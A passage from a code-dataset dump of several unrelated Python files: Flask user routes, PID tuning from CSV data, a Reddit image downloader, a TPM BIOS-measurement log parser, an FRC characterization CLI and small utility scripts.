surname=?, username=?, permission_level=? WHERE id = ?'\n db = get_db()\n db.execute(sql, [first_name, surname, username, permission_level, user_id])\n db.commit()\n flash('{} {} has been updated.'.format(first_name, surname))\n return redirect(url_for('user.home'))\n\n@bp.route(\"/create\", methods=['GET', 'POST'])\n@login_required\ndef create_user():\n if request.method == 'POST':\n #id = request.form['u_id']\n first_name = request.form['first_name']\n surname = request.form['surname']\n username = request.form['username']\n sql = 'INSERT INTO user (first_name, surname, username) VALUES (?,?,?)'\n db = get_db()\n db.execute(sql, [first_name, surname, username])\n db.commit()\n flash('{} {} has been created.'.format(first_name, surname))\n return redirect(url_for('user.home'))\n else:\n return render_template('postal/create_user.html', user_data=None)\n\n\n@bp.route(\"//stats\", methods=['GET'])\ndef user_stats(user_id):\n sel_options = query_db(\"\"\"SELECT compTeam.competition_id as id\n , competition_name as name\n , season\n FROM teamMembers\n JOIN compTeam \n ON compTeam.team_id = teamMembers.team_id\n JOIN competitions \n ON compTeam.competition_id = competitions.id\n WHERE user_id = ?\n ORDER BY season desc\"\"\", [str(user_id)])\n user_details = query_db(\"SELECT * FROM user WHERE id = ?\", [str(user_id)], one=True)\n fixed_avgs = query_db(\"\"\"\nSELECT\n (SELECT AVG(result) FROM (SELECT result FROM scores WHERE user_id = ? ORDER BY scores.completed DESC LIMIT 6)) AS six_cards,\n (SELECT AVG(result) FROM (SELECT result FROM scores WHERE user_id = ? ORDER BY scores.completed DESC LIMIT 12)) AS twelve_cards,\n (SELECT AVG(result) FROM (SELECT result FROM scores WHERE user_id = ? AND completed BETWEEN date('now', '-28 days') AND date('now'))) as four_weeks,\n (SELECT AVG(result) FROM (SELECT result FROM scores WHERE user_id = ? AND completed BETWEEN date('now', '-2 months') AND date('now'))) as two_months\n \"\"\", [str(user_id), str(user_id), str(user_id), str(user_id)], one=True)\n if request.method == 'GET':\n if request.args and request.args.get('comp_id') > '0':\n graph_data = user_comp_stats(user_id=user_id, comp_id=request.args.get('comp_id'))\n else:\n graph_data = previous_round_results(user_id=user_id, rounds=12)\n\n return render_template('postal/user_stats.html', user=user_details, avgs=fixed_avgs, user_comps=sel_options, graph_data=graph_data)\n\n\n@bp.route(\"//prev_results/\", methods=['GET', 'POST'])\ndef previous_round_results(user_id, rounds=12):\n print(\"user_id\", user_id)\n data_set = query_db(\"\"\"\n SELECT \n result, first_name, surname\n FROM\n scores\n JOIN user ON user.id = scores.user_id\n WHERE user_id = ?\n --ORDER BY scores.completed DESC \n LIMIT ? \n \"\"\", (user_id, rounds))\n results = []\n for val in data_set:\n results += [val['result']]\n data = {\n 'comp_id': 0,\n 'shooter': data_set[0]['first_name'] + \" \" + data_set[0]['surname'],\n 'rounds': [r for r, idx in enumerate(range(len(data_set)), start=1)],\n 'results_arr':results,\n 'average' : [(sum(results) / len(results)) for avg in range(len(data_set))]\n }\n return data\n\n\n@bp.route(\"//stats/\", methods=['GET', 'POST'])\ndef user_comp_stats(user_id, comp_id):\n print(\"user_id\", user_id, \"comp_id\", comp_id)\n data_set = query_db(\"\"\"\n SELECT \n result, first_name, surname\n FROM\n scores\n JOIN user \n ON user.id = scores.user_id \n WHERE user_id=? AND competition_id=? AND result > 0\n order by round\n \"\"\", (user_id, comp_id))\n results = []\n for val in data_set:\n results += [val['result']]\n data = {\n 'comp_id': comp_id,\n 'shooter': data_set[0]['first_name'] + \" \" + data_set[0]['surname'] if data_set else None,\n 'rounds': [r for r, idx in enumerate(range(len(data_set)), start=1)] if data_set else None,\n 'results_arr': results if data_set else None,\n 'average': [(sum(results) / len(results)) for avg in range(len(data_set))] if data_set else None\n }\n return data","sub_path":"src/app/core/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"591572346","text":"\"\"\" \nArchivo que contiene todas las rutinas necesarias para la funcionalidad de identificación de modelo y tunning con csv\n\"\"\"\n\nfrom scipy.ndimage import gaussian_filter\n\nimport matplotlib.ticker as mticker\nimport controlmdf as ctrl\nimport numpy as np\n\n\ndef procesar_csv(self, csv_data):\n \"\"\"\n Función para procesar la data del archivo csv, se crea una nueva data en un diccionario, se normalizan las escalas con el span y se transforma el tiempo a segundos. Para la transformación de tiempo a segundos los formatos aceptados son:\n \n hh:mm:ss\n \n mm:ss\n \n ss\n \n En cualquiera de los casos se llevara a segundos y se restara el tiempo inicial para que empiece en cero.\n \n :param csv_data: Data del csv\n :type csv_data: numpyArray\n :return: Data extraida del archivo CSV asi como indices, máximos y mínimos de la data\n :rtype: tuple(dict, list[int, int, int, float, float, float, float])\n \"\"\"\n\n # Identificacion de columnas\n for i, header in enumerate(csv_data[0]):\n if 'time' in header.lower():\n indexTime = i\n if 'vp' in header.lower():\n indexVp = i\n if 'efc' in header.lower():\n indexEFC = i\n\n csv_data = np.delete(csv_data, 0, 0)\n\n dict_data = dict()\n try:\n dict_data['time'] = np.array(csv_data[:, indexTime])\n dict_data['vp'] = np.array(list(map(float, csv_data[:, indexVp])))\n dict_data['efc'] = np.array(list(map(float, csv_data[:, indexEFC])))\n except UnboundLocalError:\n raise UnboundLocalError\n\n Tiempo = []\n\n # Transformación de tiempo a segundos\n for time_entry in dict_data['time']:\n my_time = str(time_entry)\n t1 = sum(i * j for i, j in zip(list(map(float, my_time.split(':')))[::-1], [1, 60, 3600]))\n Tiempo.append(t1)\n\n dict_data['time'] = np.array(Tiempo) - Tiempo[0]\n\n MinVP = float(self.main.EditLVP.text())\n MaxVP = float(self.main.EditUVP.text())\n MinEFC = float(self.main.EditLEFC.text())\n MaxEFC = float(self.main.EditUEFC.text())\n\n # Normalización\n FactorVP = 100 / MaxVP - MinVP\n FactorEFC = 100 / MaxEFC - MinEFC\n\n dict_data['vp'] = (dict_data['vp']-MinVP)*FactorVP\n dict_data['efc'] = (dict_data['efc']-MinEFC)*FactorEFC\n\n dict_data['time'] = dict_data['time']\n dict_data['vp'] = gaussian_filter(dict_data['vp'], 5)\n dict_data['efc'] = gaussian_filter(dict_data['efc'], 2)\n\n return dict_data, [indexTime, indexVp, indexEFC, MinVP, MaxVP, MinEFC, MaxEFC]\n\n\ndef calcular_modelo(self,\n dict_data,\n indexTime,\n indexVp,\n indexEFC,\n MinVP,\n MaxVP,\n MinEFC,\n MaxEFC):\n \"\"\"\n Función para calcular los parametros del modelo de primer orden\n \n :param dict_data: Diccionario con la data procesada del csv\n :type dict_data: dict\n :param indexTime: Indice que identifica al tiempo\n :type indexTime: int\n :param indexVp: Indice que identifica a Vp\n :type indexVp: int\n :param indexEFC: Indice que identifica al EFC\n :type indexEFC: int\n :param MinVP: Limite inferior de Vp\n :type MinVP: float\n :param MaxVP: Limite superior de Vp\n :type MaxVP: float\n :param MinEFC: Limite inferior de EFC\n :type MinEFC: float\n :param MaxEFC: Limite superior de EFC\n :type MaxEFC: float\n :return: Datos del modelo de primer orden, recta tangente y puntos asociados a la recta\n :rtype: tuple(float, float, float, float, float, float, float, float, float)\n \"\"\"\n\n y = dict_data['vp']\n t = dict_data['time']\n\n vpmin = np.min(dict_data['vp'][0])\n vpmax = np.max(dict_data['vp'][-1])\n efcmin = np.min(dict_data['efc'][0])\n efcmax = np.max(dict_data['efc'][-1])\n\n i_max = np.argmax(np.abs(np.gradient(y)))\n efc_max = np.argmax(np.abs(np.gradient(dict_data['efc'])))\n\n for index, i in enumerate(y):\n if i >= 0.63 * (vpmax-vpmin) + vpmin:\n indexv = index\n break\n\n Kc = (vpmax - vpmin)/(efcmax - efcmin)\n\n slop_efc = (dict_data['efc'][efc_max] - dict_data['efc'][efc_max - 1]) / (t[efc_max] - t[efc_max - 1])\n t0 = ((efcmin - dict_data['efc'][efc_max]) / (slop_efc) + t[efc_max])\n \n slop = (y[i_max] - y[i_max - 1]) / (t[i_max] - t[i_max - 1])\n t1 = ((vpmin - y[i_max]) / (slop) + t[i_max])\n \n t2 = t[indexv]\n y1 = vpmin\n y2 = slop * (t2 - t[i_max]) + y[i_max]\n tau = t2 - t1\n anclaT = t[i_max]\n anclaY = y[i_max]\n\n return Kc, tau, y1, y2, t0, t1, t2, anclaT, anclaY\n\n\ndef entonar_y_graficar(self, dict_data, Kc, tau, y1, y2, t0, t1, t2):\n \"\"\"\n Función para calcular el controlador PID a partir de los datos del modelo de primer orden, ademas, se graficá la data del csv junto con algunos parametros de la identificación del modelo\n \n :param dict_data: Diccionario con la data procesada del csv\n :type dict_data: dict\n :param Kc: Ganancia del proceso\n :type Kc: float\n :param tau: Constante de tiempo del proceso\n :type tau: float\n :param y1: Punto y1 de la recta de identificación, en este punto se encuentra el mayor cambio respecto al tiempo\n :type y1: float\n :param y2: Punto y2 de la recta de identificación\n :type y2: float\n :param t0: Tiempo del inicio del escalón\n :type t0: float\n :param t1: Tiempo del inicio de la respuesta del proceso ante el escalón\n :type t1: float\n :param t2: Tiempo en el que el proceso alcanza el 63% de su valor final respecto al cambio\n :type t2: float\n :return: Lista de objetos de gráficas y lista de parametros de la recta para el modelado\n :rtype: tuple(list[ObjectType, ObjectType, ObjectType, ObjectType, ObjectType, ObjectType, ObjectType, ObjectType], list[float, float, float, float, float, float])\n \"\"\"\n\n kp, ki, kd = auto_tuning_method_csv(self, Kc, tau, t1-t0, self.main.csvMetodo.currentText())\n\n self.main.csvGraphicsView.canvas.axes1.clear()\n self.main.csvGraphicsView.canvas.axes1.plot(dict_data['time'],\n dict_data['efc'],\n label='EFC')\n\n t0_efc = self.main.csvGraphicsView.canvas.axes1.axvline(x=t0,\n color='k',\n linestyle=':',\n zorder=-20,\n label='t0, t1, t2')\n t1_efc = self.main.csvGraphicsView.canvas.axes1.axvline(x=t1,\n color='k',\n linestyle=':',\n zorder=-20)\n t2_efc = self.main.csvGraphicsView.canvas.axes1.axvline(x=t2,\n color='k',\n linestyle=':',\n zorder=-20)\n\n self.main.csvGraphicsView.canvas.axes1.grid(True, which=\"both\", color=\"lightgray\")\n self.main.csvGraphicsView.canvas.axes1.legend()\n self.main.csvGraphicsView.canvas.axes1.yaxis.set_major_formatter(\n mticker.FormatStrFormatter(\"%.1f %%\")\n )\n\n self.main.csvGraphicsView.canvas.axes2.clear()\n self.main.csvGraphicsView.canvas.axes2.plot(dict_data['time'],\n dict_data['vp'],\n label='Vp')\n\n recta, = self.main.csvGraphicsView.canvas.axes2.plot([t1, t2], [y1, y2], label='recta')\n\n t0_vp = self.main.csvGraphicsView.canvas.axes2.axvline(x=t0,\n color='k',\n linestyle=':',\n zorder=-20,\n label='t0, t1, t2')\n t1_vp = self.main.csvGraphicsView.canvas.axes2.axvline(x=t1,\n color='k',\n linestyle=':',\n zorder=-20)\n t2_vp = self.main.csvGraphicsView.canvas.axes2.axvline(x=t2,\n color='k',\n linestyle=':',\n zorder=-20)\n\n self.main.csvGraphicsView.canvas.axes2.grid(True, which=\"both\", color=\"lightgray\")\n self.main.csvGraphicsView.canvas.axes2.legend()\n self.main.csvGraphicsView.canvas.axes2.yaxis.set_major_formatter(\n mticker.FormatStrFormatter(\"%.1f %%\")\n )\n\n self.main.csvGraphicsView.canvas.draw()\n self.main.csvGraphicsView.toolbar.update()\n\n actualizar_Datos(self, Kc, t0, t1, t2, kp, ki, kd)\n self.main.pidTiempoSlider.blockSignals(True)\n self.main.pidTiempoSlider.setValue(np.round(1000*(t1-t0)/(t2-t0), 3))\n self.main.pidTiempoLabelValue.setText(str(np.round(t1, 3)))\n self.main.pidTiempoSlider.blockSignals(False)\n\n\n return [t0_efc, t1_efc, t2_efc, recta, t0_vp, t1_vp, t2_vp], [Kc, t0, t1, t2, y2, y1]\n\n\ndef calculos_manual(self, GraphObjets, Kc, t0, t1, t2, slop, y1):\n \"\"\"\n Función para recalcular el controlador PID a partir de los datos del modelo de primer orden con el nuevo tiempo t1, ademas, se grafica la data del csv junto con algunos parametros de la identificación del modelo y la nueva recta\n \n :param GraphObjets: Lista de objetos de graficacion\n :type GraphObjets: list\n :param Kc: Ganancia del proceso\n :type Kc: float\n :param t0: Tiempo del inicio del escalón\n :type t0: float\n :param t1: Tiempo del inicio de la respuesta del proceso ante el escalón\n :type t1: float\n :param t2: Tiempo en el que el proceso alcanza el 63% de su valor final respecto al cambio\n :type t2: float\n :param slop: Pendiente de la recta de identificación\n :type slop: float\n :param y1: Punto y1 de la recta de identificación, en este punto se encuentra el mayor cambio respecto al tiempo\n :type y1: float\n \"\"\"\n kp, ki, kd = auto_tuning_method_csv(self, Kc, t2-t1, t1-t0, self.main.csvMetodo.currentText())\n\n GraphObjets[1].set_data(t1, [0, 1])\n GraphObjets[5].set_data(t1, [0, 1])\n new_y2 = slop * (t2 - t1) + y1\n GraphObjets[3].set_data([t1, t2], [y1, new_y2])\n self.main.csvGraphicsView.canvas.draw()\n actualizar_Datos(self, Kc, t0, t1, t2, kp, ki, kd)\n\n\ndef actualizar_Datos(self, Kc, t0, t1, t2, kp, ki, kd):\n \"\"\"\n Función para mostrar los resultados obtenidos del modelo en un TextEdit\n \n :param Kc: Ganancia del proceso\n :type Kc: float\n :param t0: Tiempo del inicio del escalón\n :type t0: float\n :param t1: Tiempo del inicio de la respuesta del proceso ante el escalón\n :type t1: float\n :param t2: Tiempo en el que el proceso alcanza el 63% de su valor final respecto al cambio\n :type t2: float\n :param kp: Ganancia proporcional\n :type kp: float\n :param ki: Ganancia integral\n :type ki: float\n :param kd: Ganancia derivativa\n :type kd: float\n \"\"\"\n \n Datos = \"Modelo:\\n\"\n Datos += str(ctrl.TransferFunction([Kc], [t2-t1, 1])) + \"\\n\"\n Datos += f\"Delay: {t1-t0:.3f}\\n\"\n Datos += \"----------------------------------------------\\n\"\n Datos += f\"Kp: {kp:.4f}\\n\"\n Datos += f\"Ki: {ki:.4f}\\n\"\n Datos += f\"Kd: {kd:.4f}\\n\"\n self.main.csvdatosTextEdit2.setPlainText(Datos)\n self.main.pidLabelController.setText(\n f\" Kc = {Kc:.3f} -- Tau = {t2-t1:.3f} -- Alpha = {t1-t0:.3f}\")\n\n\ndef auto_tuning_method_csv(self, k_proceso, tau, alpha, metodo):\n \"\"\"\n Función para obtener las ganancias del controlador PID a partir de los parametros del modelo de primer orden obtenidos de una respuesta escalón, las formulas son las dadas por Ziegler-Nichols y Cohen-Coon para una respuesta escalón en lazo abierto\n \n :param k_proceso: Ganancia del proceso\n :type k_proceso: float\n :param tau: Constante de tiempo del proceso\n :type tau: float\n :param alpha: Tiempo muerto o delay del proceso\n :type alpha: float\n :param metodo: Método a utilizar\n :type metodo: str\n :return: Ganancias kp, ki y kd\n :rtype: tuple(float, float, float)\n \"\"\"\n \n if alpha <= 0.05:\n print('Alfa es demasiado pequeño')\n raise TypeError('Alfa es demasiado pequeño')\n\n if 'ZN' in metodo:\n if 'P--' in metodo:\n kp = (1/k_proceso) * (tau/alpha)\n ti = np.infty\n td = 0\n\n if 'PI-' in metodo:\n kp = (0.9/k_proceso) * (tau/alpha)\n ti = alpha * 3.33\n td = 0\n\n if 'PID' in metodo:\n kp = (1.2/k_proceso) * (tau/alpha)\n ti = alpha * 2\n td = alpha * 0.5\n\n kp = kp\n ki = kp / ti\n kd = kp * td\n\n if 'CC' in metodo:\n if 'P--' in metodo:\n kp = (1/k_proceso) * (tau/alpha) * (1 + (1/3) * (alpha/tau))\n ti = np.infty\n td = 0\n\n if 'PI-' in metodo:\n kp = (1/k_proceso) * (tau/alpha) * (0.9 + (1/12) * (alpha/tau))\n ti = alpha * ((30 + 3 * (alpha/tau)) / (9 + 20 * (alpha/tau)))\n td = 0\n\n if 'PD-' in metodo:\n kp = ((1/k_proceso) * (tau/alpha) * ((5/4) + (1/6) * (alpha/tau)))\n ti = np.infty\n td = alpha * ((6 - 2 * (alpha/tau)) / (22 + 3 * (alpha/tau)))\n\n\n if 'PID' in metodo:\n kp = ((1/k_proceso) * (tau/alpha) * ((4/3) + (1/4) * (alpha/tau)))\n ti = alpha * ((32 + 6 * (alpha/tau)) / (13 + 8 * (alpha/tau)))\n td = alpha * (4 / (11 + 2 * (alpha/tau)))\n\n kp = kp / 2\n ki = kp / ti\n kd = kp * td\n\n return kp, ki, kd\n","sub_path":"rutinas/rutinas_CSV.py","file_name":"rutinas_CSV.py","file_ext":"py","file_size_in_byte":13998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"312198530","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 1 09:49:16 2018\n\n@author: tom\n\"\"\"\n\nimport praw\nimport requests\nimport os\nfrom imgurpython import ImgurClient\n\n\ndef downloadImgurAlbum(albumUrl):\n #print(albumUrl)\n print('Found an album')\n albumId = submission.url.split(\"/\")[-1]\n if '#' in albumId:\n albumId = albumId.split('#')[0]\n dir_path = targetSubreddit + '/' + albumId\n os.makedirs(dir_path, exist_ok=True) \n items = client.get_album_images(albumId)\n for item in items:\n imageUrl = item.link\n #print(imageUrl)\n localFileName = imageUrl.split(\"/\")[-1]\n response = requests.get(imageUrl)\n if response.status_code == 200:\n print('Downloading %s from %s...' % (localFileName,albumId))\n with open(os.path.join(dir_path, localFileName), 'wb') as fo:\n for chunk in response.iter_content(1024):\n fo.write(chunk)\n\ndef downloadImage(imageUrl):\n #print(imageUrl)\n localFileName = imageUrl.split(\"/\")[-1]\n dir_path = targetSubreddit\n os.makedirs(dir_path, exist_ok=True)\n response = requests.get(imageUrl)\n if response.status_code == 200:\n print('Downloading %s...' % (localFileName))\n with open(os.path.join(dir_path, localFileName), 'wb') as fo:\n for chunk in response.iter_content(1024):\n fo.write(chunk)\n \ndef downloadImgurImage(imageUrl, localFileName):\n pass\n\nclient_id = ''\nclient_secret = ''\n\nclient = ImgurClient(client_id, client_secret)\n\nreddit = praw.Reddit('bot1')\n\ntargetSubreddit = \"\"\npost_limit = 100\n\nsubmissions = reddit.subreddit(targetSubreddit).top(limit=post_limit) \n\nfilename = targetSubreddit # input('enter filename: ')\nos.makedirs(filename, exist_ok=True)\ndir_path = os.path.join(filename, \"%s_output.txt\" % filename)\ntext_file = open(dir_path, \"w\", errors ='ignore')\n\nfor submission in submissions:\n link = submission.url\n # print(\"Link: \", link)\n if \"imgur.com/a/\" in link:\n #Send to imgur album downloader\n downloadImgurAlbum(link)\n #Save URL\n text_file.write('{0}\\n'.format(link))\n \n elif link.endswith(\".jpg\") or link.endswith(\".png\") or link.endswith(\".gif\"):\n #Send to image downloader\n downloadImage(link)\n #Save URL\n text_file.write('{0}\\n'.format(link))\n elif \"imgur.com/\" in link and not link.endswith(\".gifv\"):\n #Send to single image imgur downloader\n # downloadImgurImage()\n #Save URL\n text_file.write('{0}\\n'.format(link))\ntext_file.close()\n\nprint('\\nDownloading done! Have a good day :)')","sub_path":"TomBot_Reddit/tombot.py","file_name":"tombot.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"165412953","text":"#!/usr/bin/env python3\nimport sys\nimport argparse\nimport struct\nimport binascii\nimport hashlib\n\n\nclass TCPAEvent:\n def __init__(self,\n pcr_index, event_type, pcr_value, event_size, event_data):\n self.pcr_index = pcr_index\n self.event_type = event_type\n self.pcr_value = pcr_value\n self.event_size = event_size\n self.event_data = event_data\n self.valid = self.__validate()\n\n def __validate(self):\n h = hashlib.sha1()\n h.update(self.event_data)\n data_digest = h.digest()\n return self.pcr_value == data_digest\n\n def __str__(self):\n return \"{:<3} {:<8x} {} {:<4} {:<5} {}\".format(\n self.pcr_index,\n self.event_type,\n binascii.hexlify(self.pcr_value).decode(),\n self.event_size,\n self.valid,\n self.event_data[:30])\n\n\nclass TCPAParser(struct.Struct):\n def __init__(self, bpath):\n super().__init__(\"= 17 and pcrnum <= 22):\n self.value = b\"\\xFF\" * 20\n else:\n self.value = b\"\\x00\" * 20\n self.__hex()\n\n def __hex(self):\n self.hval = binascii.hexlify(self.value).decode().upper()\n\n def update(self, value):\n h = hashlib.sha1()\n h.update(self.value + value)\n self.value = h.digest()\n self.__hex()\n\n def __str__(self):\n return \"PCR-{:02d}: {}\".format(\n self.pcrnum,\n \" \".join([self.hval[i:i+2] for i in range(0, len(self.hval), 2)]))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"TPM binary measurement parser.\")\n parser.add_argument(\"-f\",\n default=\"/sys/kernel/security/tpm0/binary_bios_measurements\",\n metavar=\"binary_bios_measurements_file\",\n dest=\"bfile\",\n help=\"binary_bios_measurements file path\")\n parser.add_argument(\"-r\",\n default=list(),\n action=\"append\",\n nargs=2,\n metavar=(\"ID\", \"SHA1HASH\"),\n dest=\"replacelist\",\n help=\"Replace event ID pcr_value with SHA1HASH. Could be used multiple times.\")\n args = parser.parse_args()\n\n tcpa_data = list()\n pcrs = list()\n\n for p in range(24):\n pcrs.append(PCR(p))\n\n for event in TCPAParser(args.bfile):\n tcpa_data.append(event)\n\n for ev_id, pcr_val in args.replacelist:\n try:\n ev_id = int(ev_id)\n if len(pcr_val) != 40:\n print(\"Replacement ID {} hash length error!\".format(ev_id))\n sys.exit(1)\n print(\"Replacing event ID {} hash {} with {}\".format(\n ev_id,\n binascii.hexlify(tcpa_data[ev_id].pcr_value).decode(),\n pcr_val))\n tcpa_data[ev_id].pcr_value = binascii.unhexlify(pcr_val)\n except (TypeError, ValueError):\n print(\"Replacement ID {} value error!\".format(ev_id))\n sys.exit(1)\n except IndexError:\n print(\"Replacement ID {} is out of event index!\".format(ev_id))\n sys.exit(1)\n\n for event in tcpa_data:\n pcrs[event.pcr_index].update(event.pcr_value)\n\n print(\"{:<3} {:<3} {:<8} {:<40} {:<4} {} {}\".format(\n \"Num\", \"PCR\", \"EV_type\", \"PCR_value\", \"Size\", \"Valid\", \"Data\"))\n for num, event in enumerate(tcpa_data):\n print(\"{:<3} {}\".format(num, event))\n\n print()\n print(\"Final PCRs:\")\n for p in pcrs:\n print(p)\n","sub_path":"binary_bios_measurements_parser.py","file_name":"binary_bios_measurements_parser.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"644671440","text":"# The CLI entry point for the characterization toolsuite.\n\nimport argparse\nfrom os import getcwd\nfrom sys import argv\nfrom functools import partial\n\nimport argcomplete\nimport frc_characterization\nimport frc_characterization.logger_analyzer.data_analyzer as analyzer\nimport frc_characterization.logger_analyzer.data_logger as logger\nimport frc_characterization.logger_gui as logger_gui\nimport frc_characterization.newproject as newproject\nfrom frc_characterization.newproject import Tests\n\nfrom consolemenu import ConsoleMenu\nfrom consolemenu.items import FunctionItem, SubmenuItem\n\nlangs = (\"java\", \"cpp\", \"python\")\n\ncontrollers = (\"spark\", \"talonsrx\")\n\n\ndef new_project(testType, directory=None):\n newproject.main(testType)\n\n\ndef get_analyzer(directory=None):\n analyzer.main(directory or getcwd())\n\n\ndef get_logger(testType, directory=None):\n logger_gui.main(0, directory or getcwd(), logger.TestRunner, test=testType)\n\n\ntool_dict = {\n \"drive\": {\n \"new\": partial(new_project, testType=Tests.DRIVETRAIN),\n \"logger\": partial(get_logger, testType=Tests.DRIVETRAIN),\n \"analyzer\": get_analyzer,\n },\n \"arm\": {\n \"new\": partial(new_project, testType=Tests.ARM),\n \"logger\": partial(get_logger, testType=Tests.ARM),\n \"analyzer\": get_analyzer,\n },\n \"elevator\": {\n \"new\": partial(new_project, testType=Tests.ELEVATOR),\n \"logger\": partial(get_logger, testType=Tests.ELEVATOR),\n \"analyzer\": get_analyzer,\n },\n \"simple-motor\": {\n \"new\": partial(new_project, testType=Tests.SIMPLE_MOTOR),\n \"logger\": partial(get_logger, testType=Tests.SIMPLE_MOTOR),\n \"analyzer\": get_analyzer,\n },\n}\n\n\ndef main():\n\n if len(argv) < 2:\n menu = ConsoleMenu(\n \"Mechanism Types\", \"Choose which mechanism you are characterizing\"\n )\n\n for mechanism, tools in tool_dict.items():\n tool_menu = ConsoleMenu(f\"Characterization Tools: {mechanism}\")\n for tool, function in tools.items():\n tool_menu.append_item(FunctionItem(tool, function, menu=tool_menu))\n\n menu.append_item(SubmenuItem(mechanism, tool_menu, menu))\n\n menu.show()\n\n else:\n parser = argparse.ArgumentParser(description=\"FRC characterization tools CLI\")\n parser.add_argument(\n \"mech_type\",\n choices=list(tool_dict.keys()),\n help=\"Mechanism type being characterized\",\n )\n parser.add_argument(\n \"tool_type\",\n choices=list(list(tool_dict.values())[0].keys()),\n help=\"Create new project, start data recorder/logger, or start data analyzer\",\n )\n parser.add_argument(\n \"project_directory\",\n help=\"Location for the project directory (if creating a new project)\",\n nargs=\"?\",\n default=None,\n )\n argcomplete.autocomplete(parser)\n\n args = parser.parse_args()\n tool_dict[args.mech_type][args.tool_type](directory=args.project_directory)\n\n\nif __name__ == \"__main__\":\n\n main()\n","sub_path":"frc_characterization/cli/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"19305183","text":"# Write an algorithm to determine if a number is \"happy\"\n# A happy number is a number defined by the following process:\n# Starting with any positive integer, replace the number by the sum of the squares of its digits,\n# and repeat the process until the number equals 1 (Where it will stay),\n# or it loops endlessly in a cycle which does not include 1.\n# Those numbers for which this process ends in 1 are happy numbers.\n# For example: 19 is a happy number.\n# 1^2 + 9^2 = 82\n# 8^2 + 2^2 = 68\n# 6^2 + 8^2 = 100\n# 1^2 + 0^2 + 0^2 = 1\n\n\n# 不是快乐数的数称为不快乐数(unhappy number),所有不快乐数的数位平方和计算,最後都会进入一个循环中,并且肯定会出现一个已经出现过的数。\n# 因此,只需要记录所有出现过的数,一旦检测到计算出的数前面出现过,就可以判定为不快乐数,否则一直计算到出现1为止\nclass Solution(object):\n def is_happy(self, n):\n \"\"\"\n :type n: int\n :rtype: bool\n \"\"\"\n # 使用字典而不是列表来存储,是因为字典的查询速度比列表快\n lookup = {}\n while n != 1 and n not in lookup:\n lookup[n] = True\n s = str(n)\n n1 = 0\n for i in s:\n n1 += int(i) ** 2\n n = n1\n return n == 1\n\nif __name__ == '__main__':\n print(Solution().is_happy(19))\n","sub_path":"LeetCode/Easy/Happy_Number/Happy_Number.py","file_name":"Happy_Number.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"445880758","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: C:\\Users\\Felipe\\surropt\\build\\lib\\surropt\\core\\procedures\\output.py\n# Compiled at: 2019-11-12 19:57:24\n# Size of source mod 2**32: 5050 bytes\nimport os\nfrom abc import ABC, abstractmethod\nimport numpy as np\nfrom colorama import Fore, Style, deinit, init\nfrom scipy.linalg import norm\nfrom scipy.spatial import cKDTree\n\nclass Report(ABC):\n\n def __init__(self, terminal=False, plot=False):\n super().__init__()\n self.terminal = terminal\n self.plot = plot\n\n @property\n def terminal(self):\n \"\"\"Whether or not to print each iteration info as string.\"\"\"\n return self._terminal\n\n @terminal.setter\n def terminal(self, value):\n if isinstance(value, bool):\n self._terminal = value\n else:\n raise ValueError(\"'terminal' property only accepts True or False.\")\n\n @property\n def plot(self):\n \"\"\"Whether or not to plot the iteration process.\"\"\"\n return self._plot\n\n @plot.setter\n def plot(self, value):\n if isinstance(value, bool):\n self._plot = value\n else:\n raise ValueError(\"'plot' property only accepts True or False.\")\n\n def print_iteration(self, iter_count: int, x: list, f_pred: float, f_actual: float, g_actual: float, header=False, color_font=None):\n n_x = len(x)\n if header:\n mv_header = [' x' + str(i + 1) for i in range(n_x)]\n str_arr = ['Movement', 'Iter'] + mv_header + [\n 'f_pred', 'f_actual', 'feasibility']\n arr_str = (('{:10}\\t' * len(str_arr)).format)(*str_arr)\n else:\n i = str(iter_count)\n mv_arr = np.array(x)\n num_arr = np.append(x, np.array([f_pred, f_actual, g_actual]))\n formatter = {'float_kind': lambda x: '{0: 10.4e}'.format(x)}\n str_arr = np.array2string(num_arr, separator='\\t', max_line_width=(os.get_terminal_size()[0]),\n formatter=formatter)[1:-1]\n mov = 'test'\n arr_str = '{0:10}\\t{1:10}\\t{2}'.format(mov, i, str_arr)\n if self.terminal:\n if color_font == 'red':\n print(Fore.RED + arr_str)\n else:\n print(Fore.RESET + arr_str)\n return arr_str\n\n def plot_iteration(self):\n if self.plot:\n raise NotImplementedError('plot iteration not implemented!')\n\n def get_results_report(self, index: int, r: float, x: np.ndarray, f: np.ndarray, lb: np.ndarray, ub: np.ndarray, fun_evals: int) -> str:\n \"\"\"Returns the results message report that contains info about the\n neighbourhood of `x` inside a specified domain (`lb` and `ub`).\n\n Parameters\n ----------\n index : int\n Row index of `x` that corresponds to the optimal point.\n r : float\n Radius percentage of the domain euclidian range (`lb` and `ub`) to\n search points near `x`.\n x : np.ndarray\n Sample input variables to be analysed (2D array).\n f : np.ndarray\n Sample observed objective function values (1D array, number of\n elements has to be the same as the number of rows in `x`).\n lb : np.ndarray\n Domain lower bound of the sample `x`. It is assumed that ALL the\n row of `x` are inside this domain.\n ub : np.ndarray\n Domain upper bound of the sample `x`. It is assumed that ALL the\n row of `x` are inside this domain.\n fun_evals : int\n Number of function evaluations needed to obtain the sample `x`\n\n Returns\n -------\n str\n Results report message to be printed in the terminal/cmd.\n \"\"\"\n kdtree = cKDTree(data=x)\n euc_dom_rng = norm((ub - lb), ord=2)\n neigh_idx = kdtree.query_ball_point(x=(x[index, :]), r=(r * euc_dom_rng))\n results_msg = '\\nBest feasible value found: {0:8.4f} at point\\nx = 